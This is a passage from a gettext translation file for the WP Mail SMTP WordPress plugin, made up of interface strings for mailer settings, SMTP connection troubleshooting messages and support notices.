our how-to guide for setting up <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">Mailgun with WP Mail SMTP</a>." #: src/Admin/Pages/TestTab.php:1007 msgid "Your Mailgun account does not have access to send emails." msgstr "Your Mailgun account does not have access to send emails." #: src/Admin/Pages/TestTab.php:950 src/Admin/Pages/TestTab.php:965 #: src/Admin/Pages/TestTab.php:1005 msgid "Mailgun failed." msgstr "Mailgun failed." #: src/Admin/Pages/TestTab.php:938 msgid "no" msgstr "no" #. translators: %1$s - SMTP host address, %2$s - SMTP port, %3$s - SMTP #. encryption. #: src/Admin/Pages/TestTab.php:925 msgid "Contact your web hosting provider and ask them to verify your server can connect to %1$s on port %2$s using %3$s encryption. Additionally, ask them if a firewall or security policy may be preventing the connection - many shared hosts block certain ports.<br><strong>Note: this is the most common cause of this issue.</strong>" msgstr "Contact your web hosting provider and ask them to verify your server can connect to %1$s on port %2$s using %3$s encryption. Additionally, ask them if a firewall or security policy may be preventing the connection - many shared hosts block certain ports.<br><strong>Note: this is the most common cause of this issue.</strong>" #: src/Admin/Pages/TestTab.php:922 msgid "Triple check your SMTP settings including host address, email, and password, port, and security." msgstr "Triple check your SMTP settings including host address, email, and password, port, and security." #: src/Admin/Pages/TestTab.php:917 msgid "Your SMTP host is rejecting the connection." msgstr "Your SMTP host is rejecting the connection." #: src/Admin/Pages/TestTab.php:914 src/Admin/Pages/TestTab.php:1378 msgid "Your web server is blocking the connection." msgstr "Your web server is blocking the connection." #: src/Admin/Pages/TestTab.php:911 msgid "SMTP settings are incorrect (wrong port, security setting, incorrect host)." msgstr "SMTP settings are incorrect (wrong port, security setting, incorrect host)." #: src/Admin/Pages/TestTab.php:908 src/Admin/Pages/TestTab.php:1372 msgid "Typically this error is returned for one of the following reasons:" msgstr "Typically this error is returned for one of the following reasons:" #: src/Admin/Pages/TestTab.php:900 msgid "Could not connect to the SMTP host." msgstr "Could not connect to the SMTP host." #: src/Admin/Pages/TestTab.php:861 msgid "Enter correct SMTP Username (usually this is an email address) and Password in the appropriate fields." msgstr "Enter correct SMTP Username (usually this is an email address) and Password in the appropriate fields." #: assets/languages/wp-mail-smtp-vue.php:593 src/Admin/Pages/TestTab.php:860 msgid "Enable Authentication" msgstr "Enable Authentication" #: src/Admin/Pages/TestTab.php:772 src/Admin/Pages/TestTab.php:859 msgid "Go to WP Mail SMTP plugin Settings page." msgstr "Go to WP Mail SMTP plugin Settings page." #: src/Admin/Pages/TestTab.php:856 msgid "This means the connection to your SMTP host was made successfully, but you should enable Authentication and provide correct Username and Password." msgstr "This means the connection to your SMTP host was made successfully, but you should enable Authentication and provide correct Username and Password." #: src/Admin/Pages/TestTab.php:854 msgid "Unauthenticated senders are not allowed." msgstr "Unauthenticated senders are not allowed." #: src/Admin/Pages/TestTab.php:845 msgid "Verify with them your SMTP account is in good standing and your account has not been flagged." msgstr "Verify with them your SMTP account is in good standing and your account has not been flagged." #: src/Admin/Pages/TestTab.php:844 msgid "Contact your SMTP host to ask about sending/rate limits." msgstr "Contact your SMTP host to ask about sending/rate limits." #: src/Admin/Pages/TestTab.php:839 msgid "This means the connection to your SMTP host was made successfully, but the host rejected the email." msgstr "This means the connection to your SMTP host was made successfully, but the host rejected the email." #: src/Admin/Pages/TestTab.php:837 msgid "Error due to unsolicited and/or bulk e-mail." msgstr "Error due to unsolicited and/or bulk e-mail." #: src/Admin/Pages/TestTab.php:814 src/Admin/Pages/TestTab.php:941 msgid "Verify with your SMTP host that your account has permissions to send emails using outside connections." msgstr "Verify with your SMTP host that your account has permissions to send emails using outside connections." #: src/Admin/Pages/TestTab.php:813 src/Admin/Pages/TestTab.php:940 msgid "Contact your SMTP host to confirm you are using the correct username and password." msgstr "Contact your SMTP host to confirm you are using the correct username and password." #: src/Admin/Pages/TestTab.php:812 msgid "Triple check your SMTP settings including host address, email, and password. If you have recently reset your password you will need to update the settings." msgstr "Triple check your SMTP settings including host address, email, and password. If you have recently reset your password you will need to update the settings." #: src/Admin/Pages/TestTab.php:809 msgid "Typically this error is returned when the email or password is not correct or is not what the SMTP host is expecting." msgstr "Typically this error is returned when the email or password is not correct or is not what the SMTP host is expecting." #: src/Admin/Pages/TestTab.php:808 msgid "This means we were able to connect to your SMTP host, but were not able to proceed using the email/password in the settings." msgstr "This means we were able to connect to your SMTP host, but were not able to proceed using the email/password in the settings." #: src/Admin/Pages/TestTab.php:806 msgid "Could not authenticate your SMTP account." msgstr "Could not authenticate your SMTP account." #: src/Admin/Pages/TestTab.php:795 msgid "Contact your web hosting provider and inform them you are having issues making outbound connections." msgstr "Contact your web hosting provider and inform them you are having issues making outbound connections." #: src/Admin/Pages/TestTab.php:784 msgid "Could not connect to your host." msgstr "Could not connect to your host." #: src/Admin/Pages/TestTab.php:758 msgid "If using \"Other SMTP\" Mailer, contact your SMTP host to confirm they are accepting outside connections with the settings you have configured (address, username, port, security, etc)." msgstr "If using \"Other SMTP\" Mailer, contact your SMTP host to confirm they are accepting outside connections with the settings you have configured (address, username, port, security, etc)." #: src/Admin/Pages/TestTab.php:757 msgid "If using \"Other SMTP\" Mailer, triple check your SMTP settings including host address, email, and password." msgstr "If using \"Other SMTP\" Mailer, triple check your SMTP settings including host address, email, and password." #. translators: %s - SMTP host address. #: src/Admin/Pages/TestTab.php:754 msgid "Contact your web hosting provider and ask them to verify your server can connect to %s. Additionally, ask them if a firewall or security policy may be preventing the connection." msgstr "Contact your web hosting provider and ask them to verify your server can connect to %s. Additionally, ask them if a firewall or security policy may be preventing the connection." #: src/Admin/Pages/TestTab.php:750 msgid "Typically this error is returned your web server is blocking the connections or the SMTP host denying the request." msgstr "Typically this error is returned your web server is blocking the connections or the SMTP host denying the request." #. translators: %s - SMTP host address. #: src/Admin/Pages/TestTab.php:746 src/Admin/Pages/TestTab.php:788 #: src/Admin/Pages/TestTab.php:904 msgid "This means your web server was unable to connect to %s." msgstr "This means your web server was unable to connect to %s." #: src/Admin/Pages/TestTab.php:742 msgid "Could not connect to host." msgstr "Could not connect to host." #: src/Admin/Pages/TestTab.php:732 src/Admin/Pages/TestTab.php:797 msgid "Ask them to resolve the issue then try again." msgstr "Ask them to resolve the issue then try again." #: src/Admin/Pages/TestTab.php:731 src/Admin/Pages/TestTab.php:796 msgid "The exact error you can provide them is in the Error log, available at the bottom of this page." msgstr "The exact error you can provide them is in the Error log, available at the bottom of this page." #: src/Admin/Pages/TestTab.php:730 msgid "Contact your web hosting provider and inform them your site has an issue with SSL certificates." msgstr "Contact your web hosting provider and inform them your site has an issue with SSL certificates." #: src/Admin/Pages/TestTab.php:727 src/Admin/Pages/TestTab.php:792 msgid "Typically this error is returned when web server is not configured properly." msgstr "Typically this error is returned when web server is not configured properly." #: src/Admin/Pages/TestTab.php:726 msgid "This means your web server cannot reliably make secure connections (make requests to HTTPS sites)." msgstr "This means your web server cannot reliably make secure connections (make requests to HTTPS sites)." #: src/Admin/Pages/TestTab.php:724 msgid "SSL certificate issue." msgstr "SSL certificate issue." #: src/Admin/Pages/TestTab.php:1483 msgid "WP Mail SMTP is a free plugin, and the team behind WPForms maintains it to give back to the WordPress community." msgstr "WP Mail SMTP is a free plugin, and the team behind WPForms maintains it to give back to the WordPress community." #: src/Admin/ConnectionSettings.php:167 msgid "If checked, the From Name setting above will be used for all emails, ignoring values set by other plugins." msgstr "If checked, the From Name setting above will be used for all emails, ignoring values set by other plugins." #: assets/languages/wp-mail-smtp-vue.php:246 #: src/Admin/ConnectionSettings.php:146 msgid "Force From Name" msgstr "Force From Name" #: src/Admin/ConnectionSettings.php:116 msgid "If checked, the From Email setting above will be used for all emails, ignoring values set by other plugins." msgstr "If checked, the From Email setting above will be used for all emails, ignoring values set by other plugins." #: assets/languages/wp-mail-smtp-vue.php:252 #: src/Admin/ConnectionSettings.php:95 msgid "Force From Email" msgstr "Force From Email" #: src/Admin/ConnectionSettings.php:88 msgid "Please note that other plugins can change this, to prevent this use the setting below." msgstr "Please note that other plugins can change this, to prevent this use the setting below." #: src/Admin/Pages/MiscTab.php:366 msgid "Uninstall WP Mail SMTP" msgstr "Uninstall WP Mail SMTP" #. translators: %s - Mailer anchor link. #: src/Admin/Area.php:221 msgid "Thanks for using WP Mail SMTP! To complete the plugin setup and start sending emails, <strong>please select and configure your <a href=\"%s\">Mailer</a></strong>." msgstr "Thanks for using WP Mail SMTP! To complete the plugin setup and start sending emails, <strong>please select and configure your <a href=\"%s\">Mailer</a></strong>." #: assets/languages/wp-mail-smtp-vue.php:581 #: src/Providers/OptionsAbstract.php:295 msgid "Auto TLS" msgstr "Auto TLS" #: assets/languages/wp-mail-smtp-vue.php:602 #: src/Providers/OptionsAbstract.php:273 msgid "For most servers TLS is the recommended option. If your SMTP provider offers both SSL and TLS options, we recommend using TLS." msgstr "For most servers TLS is the recommended option. If your SMTP provider offers both SSL and TLS options, we recommend using TLS." #. translators: %s - SendGrid access level. #: src/Providers/Sendgrid/Options.php:96 msgid "To send emails you will need only a %s access level for this API key." msgstr "To send emails you will need only a %s access level for this API key." #: src/Providers/Sendgrid/Options.php:88 msgid "Create API Key" msgstr "Create API Key" #. translators: %s - API key link. #: src/Providers/Sendgrid/Options.php:86 msgid "Follow this link to get an API Key from SendGrid: %s." msgstr "Follow this link to get an API Key from SendGrid: %s." #: assets/languages/wp-mail-smtp-vue.php:281 #: src/Providers/PepipostAPI/Options.php:96 #: src/Providers/Sendgrid/Options.php:67 #: src/Providers/Sendinblue/Options.php:111 #: src/Providers/Sendlayer/Options.php:101 src/Providers/SMTP2GO/Options.php:93 #: src/Providers/SMTPcom/Options.php:106 src/Providers/SparkPost/Options.php:87 msgid "API Key" msgstr "API Key" #: src/Providers/Sendgrid/Options.php:29 msgid "SendGrid" msgstr "SendGrid" #: src/Providers/SMTP/Options.php:28 msgid "Other SMTP" msgstr "Other SMTP" #: src/Providers/PepipostAPI/Options.php:63 msgid "Pepipost" msgstr "Pepipost" #. translators: %1$s - Provider name; %2$s - PHP version required by Provider; #. %3$s - current PHP version. #: src/Providers/OptionsAbstract.php:466 msgid "%1$s requires PHP %2$s to work and does not support your current PHP version %3$s. Please contact your host and request a PHP upgrade to the latest one." msgstr "%1$s requires PHP %2$s to work and does not support your current PHP version %3$s. Please contact your host and request a PHP upgrade to the latest one." #: assets/languages/wp-mail-smtp-vue.php:599 #: src/Providers/OptionsAbstract.php:350 msgid "SMTP Password" msgstr "SMTP Password" #: assets/languages/wp-mail-smtp-vue.php:596 #: src/Providers/OptionsAbstract.php:336 msgid "SMTP Username" msgstr "SMTP Username" #: src/Helpers/UI.php:38 msgid "Off" msgstr "Off" #: src/Helpers/UI.php:37 msgid "On" msgstr "On" #: assets/languages/wp-mail-smtp-vue.php:611 #: src/Providers/OptionsAbstract.php:269 msgid "TLS" msgstr "TLS" #: assets/languages/wp-mail-smtp-vue.php:608 #: src/Providers/OptionsAbstract.php:260 msgid "SSL" msgstr "SSL" #: assets/languages/wp-mail-smtp-vue.php:605 #: src/Admin/Pages/SettingsTab.php:371 src/Providers/OptionsAbstract.php:251 msgid "None" msgstr "None" #: src/Providers/Mailgun/Options.php:111 msgid "Get a Domain Name" msgstr "Get a Domain Name" #. translators: %s - Domain Name link. #: src/Providers/Mailgun/Options.php:109 msgid "Follow this link to get a Domain Name from Mailgun: %s." msgstr "Follow this link to get a Domain Name from Mailgun: %s." #: assets/languages/wp-mail-smtp-vue.php:222 #: src/Providers/Mailgun/Options.php:97 msgid "Domain Name" msgstr "Domain Name" #: assets/languages/wp-mail-smtp-vue.php:219 msgid "Private API Key" msgstr "Private API Key" #: src/Providers/Mailgun/Options.php:28 msgid "Mailgun" msgstr "Mailgun" #: src/Providers/Mail/Options.php:26 msgid "Default (none)" msgstr "Default (none)" #: src/Providers/Gmail/Options.php:203 msgid "Click the button above to confirm authorization." msgstr "Click the button above to confirm authorization." #: src/Providers/Gmail/Options.php:200 msgid "Allow plugin to send emails using your Google account" msgstr "Allow plugin to send emails using your Google account" #: src/Providers/Gmail/Options.php:158 msgid "Copy URL to clipboard" msgstr "Copy URL to clipboard" #: src/Providers/Gmail/Options.php:150 msgid "Authorized redirect URI" msgstr "Authorized redirect URI" #: assets/languages/wp-mail-smtp-vue.php:454 #: src/Providers/Gmail/Options.php:128 msgid "Client Secret" msgstr "Client Secret" #: assets/languages/wp-mail-smtp-vue.php:451 #: src/Providers/Gmail/Options.php:113 msgid "Client ID" msgstr "Client ID" #. translators: %s - email address a test email will be sent to. #: src/Admin/Pages/TestTab.php:332 src/Admin/Pages/TestTab.php:339 msgid "Test email to %s" msgstr "Test email to %s" #: src/Admin/Pages/TestTab.php:320 msgid "Test failed. Please use a valid email address and try to resend the test email." msgstr "Test failed. Please use a valid email address and try to resend the test email." #: src/Admin/Pages/TestTab.php:218 msgid "Send Email" msgstr "Send Email" #: src/Admin/Pages/AlertsTab.php:153 src/Admin/Pages/TestTab.php:158 msgid "Send To" msgstr "Send To" #: src/Admin/Pages/TestTab.php:113 msgid "Email Test" msgstr "Email Test" #: src/Admin/Pages/DebugEventsTab.php:377 src/Admin/Pages/MiscTab.php:502 #: src/Admin/Pages/SettingsTab.php:440 msgid "Settings were successfully saved." msgstr "Settings were successfully saved." #: src/Admin/Area.php:526 src/Admin/PageAbstract.php:192 msgid "Save Settings" msgstr "Save Settings" #: src/Admin/Area.php:393 src/Admin/Area.php:399 #: src/Admin/Pages/SettingsTab.php:38 msgid "General" msgstr "General" #: src/Admin/Pages/MiscTab.php:39 msgid "Misc" msgstr "Misc" #: src/Admin/Area.php:174 msgid "There was an error while processing the authentication request. Please make sure that you have Client ID and Client Secret both valid and saved." msgstr "There was an error while processing the authentication request. Please make sure that you have Client ID and Client Secret both valid and saved." #: assets/languages/wp-mail-smtp-vue.php:774 src/Admin/Area.php:167 msgid "There was an error while processing the authentication request. Please try again." msgstr "There was an error while processing the authentication request. Please try again." #. translators: %s - error code, returned by Google API. #: src/Admin/Area.php:160 msgid "There was an error while processing the authentication request: %s. Please try again." msgstr "There was an error while processing the authentication request: %s. Please try again." #: src/Admin/Pages/TestTab.php:1432 msgid "There was a problem while sending the test email." msgstr "There was a problem while sending the test email." #: src/Admin/Pages/MiscTab.php:140 msgid "Hide Announcements" msgstr "Hide Announcements" #: src/Admin/Pages/AboutTab.php:279 src/Admin/Pages/SmartRoutingTab.php:278 msgid "WPForms" msgstr "WPForms" #: src/Admin/ConnectionSettings.php:193 msgid "Return Path indicates where non-delivery receipts - or bounce messages - are to be sent." msgstr "Return Path indicates where non-delivery receipts - or bounce messages - are to be sent." #. translators: %s - URL to Mailgun.com page. #: src/Providers/Mailgun/Options.php:151 msgid "<a href=\"%s\" rel=\"\" target=\"_blank\">More information</a> on Mailgun.com." msgstr "<a href=\"%s\" rel=\"\" target=\"_blank\">More information</a> on Mailgun.com." #: src/Providers/Mailgun/Options.php:146 msgid "If you are operating under EU laws, you may be required to use EU region." msgstr "If you are operating under EU laws, you may be required to use EU region." #: src/Providers/Mailgun/Options.php:145 msgid "Define which endpoint you want to use for sending messages." msgstr "Define which endpoint you want to use for sending messages." #: assets/languages/wp-mail-smtp-vue.php:275 #: src/Providers/Mailgun/Options.php:141 #: src/Providers/SparkPost/Options.php:141 msgid "EU" msgstr "EU" #: assets/languages/wp-mail-smtp-vue.php:272 #: src/Providers/Mailgun/Options.php:132 #: src/Providers/SparkPost/Options.php:132 msgid "US" msgstr "US" #: assets/languages/wp-mail-smtp-vue.php:226 #: src/Providers/Mailgun/Options.php:122 #: src/Providers/SparkPost/Options.php:122 msgid "Region" msgstr "Region" #: src/Admin/Pages/TestTab.php:214 msgid "You cannot send an email. Mailer is not properly configured. Please check your settings." msgstr "You cannot send an email. Mailer is not properly configured. Please check your settings." #: src/Admin/Pages/TestTab.php:194 msgid "Send this email in HTML or in plain text format." msgstr "Send this email in HTML or in plain text format." #: src/Admin/Pages/TestTab.php:181 msgid "HTML" msgstr "HTML" #: src/Admin/Pages/MiscTab.php:110 msgid "Test emails are allowed to be sent, regardless of this option." msgstr "Test emails are allowed to be sent, regardless of this option." #: src/Admin/Pages/MiscTab.php:108 msgid "You will need to consult with their documentation to switch them to use default WordPress email delivery." msgstr "You will need to consult with their documentation to switch them to use default WordPress email delivery." #: src/Admin/Pages/MiscTab.php:78 msgid "Do Not Send" msgstr "Do Not Send" #. Description of the plugin #: wp_mail_smtp.php msgid "Reconfigures the <code>wp_mail()</code> function to use Gmail/Mailgun/SendGrid/SMTP instead of the default <code>mail()</code> and creates an options page to manage the settings." msgstr "Reconfigures the <code>wp_mail()</code> function to use Gmail/Mailgun/SendGrid/SMTP instead of the default <code>mail()</code> and creates an options page to manage the settings." #: assets/languages/wp-mail-smtp-vue.php:890 src/Admin/Area.php:646 #: src/Admin/Pages/AboutTab.php:225 msgid "Activated" msgstr "Activated" #: src/Admin/Area.php:518 msgid "Are you sure you want to reset the current provider connection? You will need to immediately create a new one to be able to send emails." msgstr "Are you sure you want to reset the current provider connection? You will need to immediately create a new one to be able to send emails." #. translators: %1$s - WP Mail SMTP support policy URL, %2$s - WP Mail SMTP #. support forum URL, %3$s - WPMailSMTP.com URL. #: src/Admin/Pages/TestTab.php:1528 msgid "Alternatively, we also offer <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">limited support</a> on the WordPress.org support forums. You can <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">create a support thread</a> there, but please understand that free support is not guaranteed and is limited to simple issues. If you have an urgent or complex issue, then please consider <a href=\"%3$s\" target=\"_blank\" rel=\"noopener noreferrer\">upgrading to WP Mail SMTP Pro</a> to access our priority support ticket system." msgstr "Alternatively, we also offer <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">limited support</a> on the WordPress.org support forums. You can <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">create a support thread</a> there, but please understand that free support is not guaranteed and is limited to simple issues. If you have an urgent or complex issue, then please consider <a href=\"%3$s\" target=\"_blank\" rel=\"noopener noreferrer\">upgrading to WP Mail SMTP Pro</a> to access our priority support ticket system." #. translators: %s - WPMailSMTP.com account area link. #: src/Admin/Pages/TestTab.php:1465 msgid "As a WP Mail SMTP Pro user you have access to WP Mail SMTP priority support. Please log in to your WPMailSMTP.com account and <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">submit a support ticket</a>." msgstr "As a WP Mail SMTP Pro user you have access to WP Mail SMTP priority support. Please log in to your WPMailSMTP.com account and <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">submit a support ticket</a>." #. translators: %1$s - WP.org link; %2$s - same WP.org link. #: src/Admin/Area.php:723 msgid "Please rate <strong>WP Mail SMTP</strong> <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">★★★★★</a> on <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress.org</a> to help us spread the word. Thank you from the WP Mail SMTP team!" msgstr "Please rate <strong>WP Mail SMTP</strong> <a href=\"%1$s\" target=\"_blank\" rel=\"noopener noreferrer\">★★★★★</a> on <a href=\"%2$s\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress.org</a> to help us spread the word. Thank you from the WP Mail SMTP team!" #: src/Admin/Pages/TestTab.php:840 msgid "Typically this error is returned when you are sending too many e-mails or e-mails that have been identified as spam." msgstr "Typically this error is returned when you are sending too many emails or emails that have been identified as spam." #: src/Admin/Pages/AboutTab.php:244 msgid "Install Plugin" msgstr "Install Plugin" #: src/Admin/Pages/MiscTab.php:100 msgid "Some plugins, like BuddyPress and Events Manager, are using their own email delivery solutions. By default, this option does not block their emails, as those plugins do not use default <code>wp_mail()</code> function to send emails." msgstr "Some plugins, like BuddyPress and Events Manager, are using their own email delivery solutions. By default, this option does not block their emails, as those plugins do not use default <code>wp_mail()</code> function to send emails." #. translators: %s - Blog article URL. #: src/Admin/Pages/TestTab.php:1108 msgid "Please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">read this article</a> to learn more about what can cause this error and follow the steps below." msgstr "Please <a href=\"%s\" target=\"_blank\" rel=\"noopener noreferrer\">read this article</a> to learn more about what can cause this error and follow the steps below." #: assets/languages/wp-mail-smtp-vue.php:263 #: src/Admin/ConnectionSettings.php:139 msgid "The name that emails are sent from." msgstr "The name that emails are sent from." #: src/Admin/ConnectionSettings.php:85 msgid "If you're using an email provider (Yahoo, Outlook.com, etc) this should be your email address for that account." msgstr "If you're using an email provider (Yahoo, Outlook.com, etc) this should be your email address for that account." #: assets/languages/wp-mail-smtp-vue.php:266 #: src/Admin/ConnectionSettings.php:82 msgid "The email address that emails are sent from." msgstr "The email address that emails are sent from." #: assets/languages/wp-mail-smtp-vue.php:587 #: src/Providers/OptionsAbstract.php:309 msgid "By default, TLS encryption is automatically used if the server supports it (recommended). In some cases, due to server misconfigurations, this can cause issues and may need to be disabled." msgstr "By default, TLS encryption is automatically used if the server supports it (recommended). In some cases, due to server misconfigurations, this can cause issues and may need to be disabled." #: src/Admin/ConnectionSettings.php:194 msgid "If unchecked, bounce messages may be lost." msgstr "If unchecked, bounce messages may be lost." #: assets/languages/wp-mail-smtp-vue.php:795 msgid "You have successfully linked the current site with your Zoho Mail API project. Now you can start sending emails through Zoho Mail." msgstr "You have successfully linked the current site with your Zoho Mail API project. Now you can start sending emails through Zoho Mail." #. translators: %1$s - Plugin name causing conflict. #: src/Conflicts.php:492 msgid "Heads up! WP Mail SMTP has detected %1$s is activated. Please deactivate %1$s to prevent conflicts." msgstr "Heads up! WP Mail SMTP has detected %1$s is activated. Please deactivate %1$s to prevent conflicts." #: src/Admin/Pages/TestTab.php:280 msgid "Test plain text email was sent successfully! Please check your inbox to make sure it was delivered." msgstr "Test plain text email was sent successfully! Please check your inbox to make sure it was delivered." #: src/Admin/Pages/TestTab.php:1085 msgid "Typically this error occurs because the address to which the email was sent to is invalid or was empty." msgstr "Typically this error occurs because the address to which the email was sent to is invalid or was empty." #: src/Admin/Pages/TestTab.php:1008 msgid "Typically this error occurs because you have not set up and/or complete domain name verification for your Mailgun account." msgstr "Typically this error occurs because you have not set up and/or complete domain name verification for your Mailgun account." #: src/Admin/DashboardWidget.php:570 msgid "Save Changes" msgstr "Save Changes" #: src/Admin/Area.php:318 src/Admin/Area.php:319 src/Admin/Area.php:1278 msgid "Settings" msgstr "Settings" #: assets/languages/wp-mail-smtp-vue.php:249 #: src/Admin/ConnectionSettings.php:70 src/Admin/Pages/SmartRoutingTab.php:180 #: src/Admin/Pages/SmartRoutingTab.php:210 msgid "From Email" msgstr "From Email" #: assets/languages/wp-mail-smtp-vue.php:242 #: src/Admin/ConnectionSettings.php:127 src/Admin/Pages/ExportTab.php:111 msgid "From Name" msgstr "From Name" #: assets/languages/wp-mail-smtp-vue.php:590 #: src/Providers/OptionsAbstract.php:317 msgid "Authentication" msgstr "Authentication" #: assets/languages/wp-mail-smtp-vue.php:523 src/Admin/Pages/TestTab.php:253 #: src/SiteHealth.php:352 msgid "Send a Test Email" msgstr "Send a Test Email" #: assets/languages/wp-mail-smtp-vue.php:641 #: src/Admin/ConnectionSettings.php:202 src/Admin/Pages/ExportTab.php:125 msgid "Mailer" msgstr "Mailer" #: src/Admin/ConnectionSettings.php:177 msgid "Return Path" msgstr "Return Path" #: assets/languages/wp-mail-smtp-vue.php:572 #: src/Providers/OptionsAbstract.php:227 msgid "SMTP Host" msgstr "SMTP Host" #: assets/languages/wp-mail-smtp-vue.php:578 #: src/Providers/OptionsAbstract.php:281 msgid "SMTP Port" msgstr "SMTP Port" #: assets/languages/wp-mail-smtp-vue.php:575 #: src/Providers/OptionsAbstract.php:241 msgid "Encryption" msgstr "Encryption" #. Plugin Name of the plugin #. Author of the plugin #: wp_mail_smtp.php src/Admin/Area.php:307 src/Admin/Area.php:308 #: src/Admin/Area.php:365 src/Admin/Area.php:366 #: src/Admin/DashboardWidget.php:164 src/Admin/DashboardWidget.php:562 #: src/SiteHealth.php:43 msgid "WP Mail SMTP" msgstr "WP Mail SMTP"